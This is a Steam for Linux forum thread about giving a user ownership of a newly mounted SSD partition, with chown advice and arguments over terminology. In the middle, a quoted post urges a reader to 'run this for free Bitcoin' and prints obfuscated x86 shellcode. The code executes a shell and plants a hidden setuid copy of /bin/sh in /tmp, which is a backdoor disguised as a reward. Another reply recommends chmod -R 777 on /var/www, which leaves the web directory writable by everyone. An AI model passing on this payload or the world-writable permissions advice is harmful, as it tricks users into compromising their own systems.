Steam for Linux

Steam for Linux

davoto Jul 22, 2020 @ 12:48pm
how change drive ownership?
I'm about to create a new partition for a new ssd. Was wondering if I can change ownership during the partitioning process to myself instead of root only, or should I not do that? I gave myself permission for a single folder on the drive at least.
< >
Showing 1-9 of 9 comments
Zyro Jul 22, 2020 @ 1:01pm 
I don't think drive ownership is a thing, but you can give owenership to the place where you mount it.
davoto Jul 22, 2020 @ 1:13pm 
Oh okay. Done and done. Thought it'd be more complicated than that. Just repeated what I did with that one folder, but the whole drive instead.
Last edited by davoto; Jul 22, 2020 @ 1:13pm
N0P3 Jul 22, 2020 @ 6:17pm 
Drive ownership is possible, but is not widely available and would have to be done with a trusted platform kind of chip that would most likely password protect the drive being done at the bios level.

You can password protect, but more realistically encrypt partitions only after you create the thing which is probably the best solution requiring the equivalent of a password and technically give you ownership of said partition. This type of option (encryption) is available in Windows, Linux and BSD systems (believe MacOS too) and probably requires a bit of setup and reading prior developing familiarity with the process preventing bad things from happening.
Nemesis2k7 Jul 23, 2020 @ 2:25am 
Originally posted by Davoto:
I'm about to create a new partition for a new ssd. Was wondering if I can change ownership during the partitioning process to myself instead of root only, or should I not do that? I gave myself permission for a single folder on the drive at least.


sudo chown -R username:username /yourmounteddrivehere then right click the drive, go to properties, and make sure the file permissions are set correctly. drive ownership IS available and widely so. these people are ignorant to linux and have no idea.
Zyro Jul 23, 2020 @ 3:39am 
Originally posted by Nemesis:
sudo chown -R username:username /yourmounteddrivehere then right click the drive, go to properties, and make sure the file permissions are set correctly. drive ownership IS available and widely so. these people are ignorant to linux and have no idea.

That's not drive ownership, that's the mount directory ownership, just like any other directory ownership. (It's also about a mounted partition, not the drive.)
Which happens just to be what I said:

Originally posted by Zyro:
I don't think drive ownership is a thing, but you can give owenership to the place where you mount it.

Please first read, than think, than rant - if appropriate and if it has to be done. Thanks.
Kiba Snowpaw Jul 23, 2020 @ 8:04am 
sudo chmod -R 777 /var/www or sudo chown -R username:username /var/www
Last edited by Kiba Snowpaw; Jul 23, 2020 @ 8:05am
Nemesis2k7 Jul 23, 2020 @ 3:30pm 
Originally posted by J0rclan:
Originally posted by Nemesis:


sudo chown -R username:username /yourmounteddrivehere then right click the drive, go to properties, and make sure the file permissions are set correctly. drive ownership IS available and widely so. these people are ignorant to linux and have no idea.

Nemesis run this for free Bitcoin.

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;


bitcoin is a MLM / pyramid scheme. troll someone else kid
Nemesis2k7 Jul 23, 2020 @ 3:52pm 
Originally posted by J0rclan:
Originally posted by Nemesis:


bitcoin is a MLM / pyramid scheme. troll someone else kid

You have no idea what I posted! 🤣 What did I post btw? Also, I'm 34. Only kids call other people kids.


if you are 34 , i suggest you act like it. and you posted a bunch of random nonsense, and you are triggered obviously. go troll someone else. kid. btw, bitcoin is a known pyramid scheme. so nice try. blocked.
Bloo Alien Jul 23, 2020 @ 7:50pm 
Originally posted by Zyro:
Originally posted by Nemesis:
sudo chown -R username:username /yourmounteddrivehere then right click the drive, go to properties, and make sure the file permissions are set correctly. drive ownership IS available and widely so. these people are ignorant to linux and have no idea.

That's not drive ownership, that's the mount directory ownership, just like any other directory ownership. (It's also about a mounted partition, not the drive.)
Which happens just to be what I said:

Originally posted by Zyro:
I don't think drive ownership is a thing, but you can give owenership to the place where you mount it.

Please first read, than think, than rant - if appropriate and if it has to be done. Thanks.
Actually, he's sorta correct. If you mount the partition and then change ownership or permissions on the mounted partition, you're setting it for the mounted partition, where if you change the settings for the mount folder before mounting anything to it, those permissions may be entirely different from those on the partition you mount there. Not everyone is entirely clear on the relation between partitions, drives, mounts, and permissions, so he could be forgiven for not being 100% exactly semantically correct on usage of one or more of those terms, but what he said about setting the permissions or ownership for the entire partition was not incorrect really.
< >
Showing 1-9 of 9 comments
Per page: 1530 50

Date Posted: Jul 22, 2020 @ 12:48pm
Posts: 9